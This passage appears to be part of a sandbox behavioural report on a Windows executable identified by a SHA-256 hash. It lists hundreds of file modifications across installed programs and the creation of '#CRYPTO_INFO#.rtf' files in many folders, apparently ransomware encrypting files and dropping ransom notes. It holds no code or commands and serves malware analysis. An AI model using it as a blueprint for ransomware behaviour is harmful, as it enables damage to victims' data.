modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\management\snmp.acl.template 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jinfo.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\javax.servlet.jsp_2.2.0.v201112011158.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\unpack200.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496939244.profile.gz 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_same_reviewers.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\jsse.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\ro-ro\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\zh-tw\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\lib\locale\jfluid-server_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\hu\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\s_checkbox_selected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fi-fi\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\hr-hr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\maintenanceservice.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-gb\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\he-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\eu-es\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\svgCheckboxUnselected.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adc_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\sv-se\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javaws.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\SaveAsRTF.api 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_download_pdf_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_ellipses_selected.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\SmallLogo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\core_icons_retina.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\3difr.x3d 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\dd_arrow_small2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_auditreport_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\rhp_world_icon_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\cstm_brand_preview.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\altDekstopCopyPasteHelper.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Update\1.3.35.452\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluEmptyStateCCFiles_280x192.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\uk\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\organize.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filterselected-dark-default_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\misc\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\MANIFEST.MF 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-charts_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\psfont.properties.ja 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\hu_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sv-se\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_gtk.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.zh_CN_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_shared.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ko-kr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview-hover.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\config.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lets-get-started.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\S_ThumbUpOutline_22_N1.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\es-es\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\ext\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\images\themeless\desktop_acrobat_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\core\locale\com-sun-tools-visualvm-modules-startup_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nb-no\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\progress-indeterminate.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\pt-br\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\css\main-selector.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\text.cur 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\HomeBanner-4x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\lib\derbyrun.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\license.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_filter-dark-disabled_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\cs-cz\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\deploy\messages_pt_BR.properties 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\sk-sk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\tl\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\jmc.ini 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\new_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\ui-strings.js 